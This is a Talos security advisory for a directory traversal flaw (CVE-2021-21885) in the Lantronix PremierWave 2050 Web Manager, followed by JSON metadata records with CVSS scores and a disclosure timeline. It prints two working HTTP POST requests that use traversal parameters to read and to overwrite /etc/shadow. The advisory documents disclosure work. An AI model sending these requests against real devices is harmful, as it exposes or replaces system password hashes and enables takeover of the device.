Lantronix PremierWave 2050 Web Manager FsMove directory traversal vulnerability
2021-11-15T00:00:00
ID TALOS-2021-1329 Type talos Reporter Talos Intelligence Modified 2021-11-15T00:00:00
Description
Summary
A directory traversal vulnerability exists in the Web Manager FsMove functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially crafted HTTP request can lead to local file inclusion. An attacker can make an authenticated HTTP request to trigger this vulnerability.
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Details
PremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.
The PremierWave 2050 Web Manager allows an authenticated and properly authorized user to move files around within a subdirectory of the device’s filesystem, rooted at /ltrx_user/. The system attempts to limit the user from interacting with files located outside of the /ltrx_user/ directory by sanitizing some, but not all, of the attacker-controlled HTTP Post parameters. This feature is only accessible to users with the filesystem privilege.
A combination of attacker-controlled HTTP parameters - cwd and dst - can be altered to include path traversal primitives which will not be sanitized before composition of the final file paths and allows the attacker to move arbitrary files into arbitrary locations, including the /ltrx_user/ directory where they can be read by any authenticated user, regardless of permission.
The below request will move /etc/shadow into /ltrx_user/shadow.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 79
Authorization: Basic YnJvd25pZTpwb2ludHM=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ajax=FsMove&src=shadow&dst=../ltrx_user/shadow&submit=Move&cwd=/../etc/
Conversely, it is also possible to upload a file into /ltrx_user/ and then use this vulnerability to move the file into an arbitrary destination within the filesystem.
The below request will overwrite /etc/shadow with /ltrx_user/shadow.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 79
Authorization: Basic YnJvd25pZTpwb2ludHM=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ajax=FsMove&src=../ltrx_user/shadow&dst=shadow&submit=Move&cwd=/../etc/
Timeline
2021-06-14 - Vendor Disclosure
2021-06-15 - Vendor acknowledged
2021-09-01 - Talos granted disclosure extension to 2021-10-15
2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date
2021-11-15 - Public Release
{"id": "TALOS-2021-1329", "vendorId": null, "type": "talos", "bulletinFamily": "info", "title": "Lantronix PremierWave 2050 Web Manager FsMove directory traversal vulnerability", "description": "### Summary\n\nA directory traversal vulnerability exists in the Web Manager FsMove functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially crafted HTTP request can lead to local file inclusion. An attacker can make an authenticated HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nLantronix PremierWave 2050 8.9.0.0R4 (in QEMU)\n\n### Product URLs\n\n<https://www.lantronix.com/products/premierwave2050/>\n\n### CVSSv3 Score\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n### Details\n\nPremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.\n\nThe PremierWave 2050 Web Manager allows an authenticated and properly authorized user to move files around within a subdirectory of the device\u2019s filesystem, rooted at `/ltrx_user/`. The system attempts to limit the user from interacting with files located outside of the `/ltrx_user/` directory by sanitizing some, but not all, of the attacker-controlled HTTP Post parameters. This feature is only accessible to users with the `filesystem` privilege.\n\nA combination of attacker-controlled HTTP parameters - `cwd` and `dst` \\- can be altered to include path traversal primitives which will not be sanitized before composition of the final file paths and allows the attacker to move arbitrary files into arbitrary locations, including the `/ltrx_user/` directory where they can be read by any authenticated user, regardless of permission.\n\nThe below request will move `/etc/shadow` into `/ltrx_user/shadow`.\n \n \n POST / HTTP/1.1\n Host: [IP]:[PORT]\n Content-Length: 79\n Authorization: Basic YnJvd25pZTpwb2ludHM=\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\n Content-Type: application/x-www-form-urlencoded\n Accept: */*\n Accept-Encoding: gzip, deflate\n Accept-Language: en-US,en;q=0.9\n Connection: close\n \n ajax=FsMove&src=shadow&dst=../ltrx_user/shadow&submit=Move&cwd=/../etc/\n \n\nConversely, it is also possible to upload a file into `/ltrx_user/` and then use this vulnerability to move the file into an arbitrary destination within the filesystem.\n\nThe below request will overwrite `/etc/shadow` with `/ltrx_user/shadow`.\n \n \n POST / HTTP/1.1\n Host: [IP]:[PORT]\n Content-Length: 79\n Authorization: Basic YnJvd25pZTpwb2ludHM=\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\n Content-Type: application/x-www-form-urlencoded\n Accept: */*\n Accept-Encoding: gzip, deflate\n Accept-Language: en-US,en;q=0.9\n Connection: close\n \n ajax=FsMove&src=../ltrx_user/shadow&dst=shadow&submit=Move&cwd=/../etc/\n \n\n### Timeline\n\n2021-06-14 - Vendor Disclosure \n2021-06-15 - Vendor acknowledged \n2021-09-01 - Talos granted disclosure extension to 2021-10-15 \n2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date \n2021-11-15 - Public Release\n", "published": "2021-11-15T00:00:00", "modified": "2021-11-15T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1329", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2021-21885"], "immutableFields": [], "lastseen": "2022-01-26T11:41:07", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21885"]}], "rev": 4}, "score": {"value": 6.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-21885"]}]}, "exploitation": null, "vulnersScore": 6.0}, "_state": {"dependencies": 1646261205}}
{"cve": [{"lastseen": "2022-04-28T21:31:15", "description": "A directory traversal vulnerability exists in the Web Manager FsMove functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially crafted HTTP request can lead to local file inclusion. An attacker can make an authenticated HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-22T19:15:00", "type": "cve", "title": "CVE-2021-21885", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21885"], "modified": "2022-04-28T19:36:00", "cpe": ["cpe:/o:lantronix:premierwave_2050_firmware:8.9.0.0"], "id": "CVE-2021-21885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21885", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:*"]}]}
